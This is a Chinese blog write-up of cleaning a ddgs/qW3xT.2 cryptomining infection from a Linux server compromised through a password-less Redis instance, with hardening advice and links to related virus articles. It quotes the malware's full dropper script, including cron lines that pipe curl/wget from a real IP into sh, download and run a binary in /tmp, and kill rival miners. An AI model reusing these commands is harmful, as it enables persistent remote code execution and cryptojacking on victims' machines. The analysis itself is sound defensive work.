linux服务器被植入ddgs、qW3xT.2挖矿病毒的处理实战记录

前言

随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一。病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高,C盘可使用空间骤降,电脑温度升高,风扇噪声增大等问题。

本文主要介绍的是关于linux植入ddgs、qW3xT.2挖矿病毒的处理方法,下面话不多说了,来一起看看详细的介绍吧

被入侵后的现象:

发现有qW3xT.2与ddgs两个异常进程,消耗了较高的cpu,kill掉后 过一会就会重新出现。

kill 掉这两个异常进程后,过一段时间看到了如下进程:

首先在/etc/sysconfig/crotnab中的定时任务没有找到定时脚本,输入crontab -e 在其中找到了该定时任务

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
<span style="font-size: 15px;">查询了下149.56.106.215在美国,i.sh 脚本内容如下:</span>
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
 wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
 curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

处理方法:

1.删除  crontab -e 中

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2.清除/root/.ssh/authorized_keys 中黑客设置的免密登录内容

3.修改redis密码

4.修改root与登录账户密码

安全建议:

1.配置bind选项,限定可以连接Redis服务器的IP,修改 Redis 的默认端口6379 配置认证,也就是AUTH,设置密码,密码会以明文方式保存在Redis配置文件中

2.配置rename-command 配置项 “RENAME_CONFIG”,这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度

3.如果可以在防火墙中屏蔽redis外网

入侵方式:

收集了相关资料,了解到其是利用redis漏洞,未设置密码或密码太简单,导致的被入侵。具体方式可以参考

https://www.jb51.net/article/147375.htm

reids修改密码方法如下:

redis-cli -h 127.0.0.1 -p 6379
config get requirepass ##获取当前密码
config set requirepass "yourpassword" ##设置当前密码,服务重新启动后又会置为默认,即无密码;

永久生效方法为,打开redis配置文件redis.conf,找到requirepass值修改密码,如下:

requirepass yourpassword ##此处注意,行前不能有空格

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,如果有疑问大家可以留言交流,谢谢大家对我们的支持。

(0)

相关推荐

  • VBS.Runauto脚本病毒分析篇

    最近一位同事的笔记本遭遇了这个病毒,正好这学期在给计算机专业的同学们上VBscript于是顺便分析了一下. 首先从染病毒的计算机上提取下来病毒样本,由于是临时发现的,也没有特别准备,就用winrar压缩后保存. 在实验机器上打开病毒样本的压缩文件,我的Symantec 11立即报警,并把病毒删除了.所以必须禁用杀毒软件或者设置一个"例外区域"用于分析病毒,于是在桌面上新建了"evA"文件夹,并将之设置为防病毒例外文件夹,这下病毒样本安静的躺在里面了. 脚本病毒是解释

  • 对一个vbs脚本病毒的病毒原理分析

    一.前言 病毒课老师丢给我们一份加密过的vbs脚本病毒的代码去尝试分析,这里把分析过程发出来,供大家参考,如果发现文中有什么错误或者是有啥建议,可以直接留言给我,谢谢! 二.目录 整个分析过程可以分为以下几个部分: 0x00 准备工作 0x01 解密部分 0x02 功能分析 三.分析过程 0x00 准备工作 windows xp的虚拟机(在自己的windows下也可以做) vbs的一些基本语法 0x01 解密部分 右击病毒文件然后编辑打开或者是直接把其后缀修改成txt直接打开都行,可以看到一大段

  • 利用DOS命令来对抗U盘病毒保护U盘数据

    U盘的便捷性与大容量的存储性,深受着广大用户的欢迎,几乎每个用户都会人手一个,但就是这么广泛的使用,以至于U盘被病毒悄悄盯上,越来越多的病毒通过电脑.通过文件毁坏重要的数据,为了保护好U盘的数据,灭除U盘病毒成为了用户们的首要任务,下面就教大家一个小技巧,利用DOS命令来对抗U盘病毒. 利用DOS命令删除U盘病毒的步骤: 1.点击"开始→运行",输入"CMD",按回车键 2.打开命令提示符窗口,切换到U盘所在盘符或是中了Autorun.inf病毒的盘符下,依次执行下

  • Rootkit病毒的解决办法

    在诸多病毒类型里面最让人深恶痛绝的就是Rootkit(内核型)蠕虫病毒,许多时候杀毒软件能检测到该病毒,但却无法有效清除.此类病毒的特点是病毒文件为两个或多个,一个是扩展名为EXE的可执行类型文件,一个是扩展名为SYS的驱动类型文件.EXE可执行文件为传统的蠕虫病毒模块,负责病毒的生成.感染.传播.破坏等任务:SYS文件为Rootkit模块. Rootkit也是一种木马,但它较我们常见的"冰河"."灰鸽子"等木马更加隐蔽,它以驱动程序的方式挂入系统内核,然后它负责执

  • 自制杀u盘病毒的批处理代码

    复制代码 代码如下: @echo off&mode con cols=61 lines=25&color f2title U盘病毒天敌echo 名称:u盘病毒的天敌echo 平台:windows xpecho 作者:小强echo 版权所有,请勿倒翻!cd\ del /f /q /ah *.exe 2>nuldel /f /q /as *.exe 2>nuldel /f /q ...exe 2>nuldel /f /q *.inf 2>nulmd autorun.in

  • c病毒程序原理分析(防范病毒 c语言小病毒示例)

    病毒的特点: 病毒的最大特点就是自我复制,从病毒的分类来说有很多种,这里我们将介绍最流行的附加式病毒,它通过对正常的文件进行改写,增加来实现其自我复制的目的.从程序的角度来说,我们要做的事情有两件: 1,让程序能够将自己在不影响其它程序本身工作的情况下复制给其它程序,使它具备继续复制的能力. 2,在一定条件下使其产生某种发作效果.其实第一件事情实际上可以看成对文件进行复制,把病毒源文件的功能函数全部放到被感染文件的最后,同时在被感染文件中调用这个函数 下面给出c语言的实现过程:1,主程序调用病毒

  • Autorun 病毒清除工具bat代码

    复制代码 代码如下: @Echo Off color 2f title Autorun 病毒清除工具-By Phexon Rem 杀进程 taskkill /F /IM SocksA.exe /IM SVOHOST.exe /IM AdobeR.exe /IM ravmone.exe /IM wincfgs.exe /IM doc.exe /IM rose.exe /IM sxs.exe /IM autorun.exe /IM KB20060111.exe /IM tel.xls.exe>nul

  • 解析:清除SQL被注入恶意病毒代码的语句

    在SQL查询分析器执行以下代码就可以了. 复制代码 代码如下: declare @t varchar(255),@c varchar(255)declare table_cursor cursor for select a.name,b.namefrom sysobjects a,syscolumns b ,systypes cwhere a.id=b.id and a.xtype='u' and c.namein ('char', 'nchar', 'nvarchar', 'varchar',

  • 记事本U盘病毒 Notepad.exe查杀方法

    特征: 1,运行Notepad.exe后,%SYSTEMROOT%system32建立随机命名文件夹935F0D,释放C:\WINDOWS\system32\935F0D\96B69A.EXE, 2,在%USERPROFILE%「开始」菜单\程序\启动中建立图标为文件夹文件名为空格的快捷方式,指向c:\windows\system32\935f0d\96b69a.exe 3,添加启动到HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,指向c:\

  • 一段病毒常用的VBS代码

    复制代码 代码如下: On error resume next Dim fso,wshell,curfolder,curdristr,curdri Set fso=createobject("scripting.filesystemobject") Set wshell=CreateObject("WScript.shell") Set curfolder=fso.GetFolder(".") curdristr=Left(WScript.Scr

  • 美女游戏病毒iwbkvd.exe查杀方法

    按下F8進入安全模式. 一,運行PowerRmv,點擊"鎖定目標"在路徑c:\winnt\system32或者c:\windows\system32下找到severe.exe的文件,進行殺滅.iwbkvd.exe同樣.powerrmv網上有得下,您可以下載一個. 二,使用卡卡的IE修復功能進行IE修復 三,使用卡卡的啟動項管理功能查看病毒的登陸項進行刪除,并找到對應的病毒程序文件進行清除. 四,使用卡卡的啟動項管理功能查看病毒的應用程式劫持項進行刪除. 五,使用SREng修復系統的文件

  • 通过批处理关闭135 137 445等端口的实现代码(勒索病毒)

    主要是通过bat操作防火墙添加规则,一般是tcp与udp. 日前,全球近百个国家和地区都有电脑系统遭受一个名为WannaCry的病毒攻击,被攻击者被要求支付比特币才能解锁.12日,安全软件制造商Avast表示,它已经在99个国家观察到超过57000个感染例子. 13日,中国国家互联网应急中心发文称,互联网上出现针对Windows操作系统的勒索软件的攻击案例,勒索软件利用此前披露的Windows SMB服务漏洞(对应微软漏洞公告:MS17-010)攻击手段,向终端用户进行渗透传播,并向用户勒索比特

  • VC实现的病毒专杀工具完整实例

    本文实例讲述了VC实现的病毒专杀工具的方法.非常实用,分享给大家供大家参考.具体实现方法如下: 如今病毒木马蠕虫层出不穷,变种也是一个接一个.反病毒公司以及各大安全公司随着影响很大的病毒的出现都会免费提供病毒专杀工具,这个举措对普通用户来说确实很有帮助.其实写病毒专杀工具也不像大家想象的那么神秘,利用SDK写个控制台程序来实现病毒专杀,因无须写图形界面,所以简便快捷!你自己也能写!不信?就接着看吧^_^ 废话不说了,接下来就开始谈谈病毒专杀工具的思路及实现方法. 本文中讲解的病毒专杀工具是针对木

  • php网页病毒清除类

    本文实例讲述了php网页病毒清除类.分享给大家供大家参考.具体如下: 相信很多人的网页经常被无故的在php,asp,html,js 等文件后台加上一些木马地址,造成了很大的困扰!我以前有个站就是这样,所以一恨之下写了这段代码,文章虽然有一点浪费资源了,但是总比我们手动清除要好吧,下面我为讲讲程序的清除病毒的原理吧. 首先们要读取 $checkFile 文件这个文章是判断一个文章 是否被感染了,如果是就会执行$savafile变量里面的txt文件路径的所有文件,进行按你infecFile病毒列表清

  • 批处理 Autorun 病毒清除工具

    @Echo Off color 2f title Autorun 病毒清除工具-By Phexon Rem 杀进程 taskkill /F /IM SocksA.exe /IM SVOHOST.exe /IM AdobeR.exe /IM ravmone.exe /IM wincfgs.exe /IM doc.exe /IM rose.exe /IM sxs.exe /IM autorun.exe /IM KB20060111.exe /IM tel.xls.exe>nul 2>nul :cl

随机推荐